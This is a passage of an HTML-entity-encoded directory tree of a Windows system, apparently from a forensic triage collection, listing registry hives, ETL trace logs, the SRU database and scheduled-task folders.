&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250815_214219_970.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250820_165007_152.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250820_171359_555.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250824_224525_122.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250824_231618_893.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9492;&#9472;&#9472; dosvc.20250825_195228_352.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NTUSER.DAT
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NTUSER.DAT.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; NTUSER.DAT.LOG2
&#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; System32
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; config
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DEFAULT
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DEFAULT.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DEFAULT.LOG2
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SAM
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SAM.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SAM.LOG2
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SECURITY
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SECURITY.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SECURITY.LOG2
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SOFTWARE
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SOFTWARE.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SOFTWARE.LOG2
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SYSTEM
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SYSTEM.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SYSTEM.LOG2
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LogFiles
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WMI
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LwtNetLog.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft-Windows-Rdp-Graphics-RdpIdd-Trace.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NetCore.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NtfsLog.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; RadioMgr.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; RtBackup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EtwRTDefenderApiLogger.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EtwRTDefenderAuditLogger.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EtwRTDiagLog.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EtwRTDiagtrack-Listener.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EtwRTEventLog-Application.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; EtwRTEventLog-System.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Wifi.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SleepStudy
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOn
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-14-09-29-01.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-15-14-04-44.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-15-14-21-51.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-20-09-47-48.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-20-10-11-35.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-24-15-44-28.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-24-15-59-09.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-24-16-14-18.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-25-12-50-27.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ScreenOnPowerStudyTraceSession-2025-08-25-13-07-35.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UserNotPresentSession.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRU
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRU00031.log
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRU00032.log
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRU00033.log
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRU.chk
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRUDB.dat
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRUDB.jfm
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRU.log
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SRUres00001.jrs
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SRUtmp.log
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Tasks
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Active Directory Rights Management Services Client
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AD RMS Rights Policy Template Management (Automated)
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; AD RMS Rights Policy Template Management (Manual)
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppID
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EDP Policy Manager
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PolicyConverter
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; VerifiedPublisherCertStoreCheck
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; applicationdata
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; appuriverifierdaily
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; appuriverifierinstall
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CleanupTemporaryState
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; DsSvcCleanup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Application Experience
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft Compatibility Appraiser
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PcaPatchDbTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ProgramDataUpdater
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; StartupAppTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppListBackup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Backup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppxDeploymentClient
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Pre-staged app cleanup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Autochk
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Proxy
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BitLocker
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BitLocker Encrypt All Drives
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; BitLocker MDM policy Refresh
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Bluetooth
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UninstallDeviceTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BrokerInfrastructure
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; BgTaskRegistrationMaintenanceTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CertificateServicesClient
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AikCertEnrollTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CryptoPolicyTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; KeyPreGenTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SystemTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UserTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UserTask-Roam
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Chkdsk
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ProactiveScan
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SyspartRepair
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Clip
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LicenseImdsIntegration
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; License Validation
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CloudExperienceHost
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; CreateObjectTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Customer Experience Improvement Program
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Consolidator
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UsbCeip
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Data Integrity Scan
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Data Integrity Check And Scan
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Data Integrity Scan
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Data Integrity Scan for Crash Recovery
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Defrag
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ScheduledDefrag
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DeviceDirectoryClient
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HandleCommand
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HandleWnsCommand
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IntegrityCheck
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocateCommandUserSession
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RegisterDeviceAccountChange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RegisterDeviceLocationRightsChange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RegisterDevicePeriodic24
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RegisterDevicePolicyChange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RegisterDeviceProtectionStateChanged
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RegisterDeviceSettingChange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; RegisterUserDevice
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Device Information
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Device
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Device User
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Device Setup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Metadata Refresh
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Diagnosis
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RecommendedTroubleshootingScanner
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Scheduled
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DirectX
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DirectXDatabaseUpdater
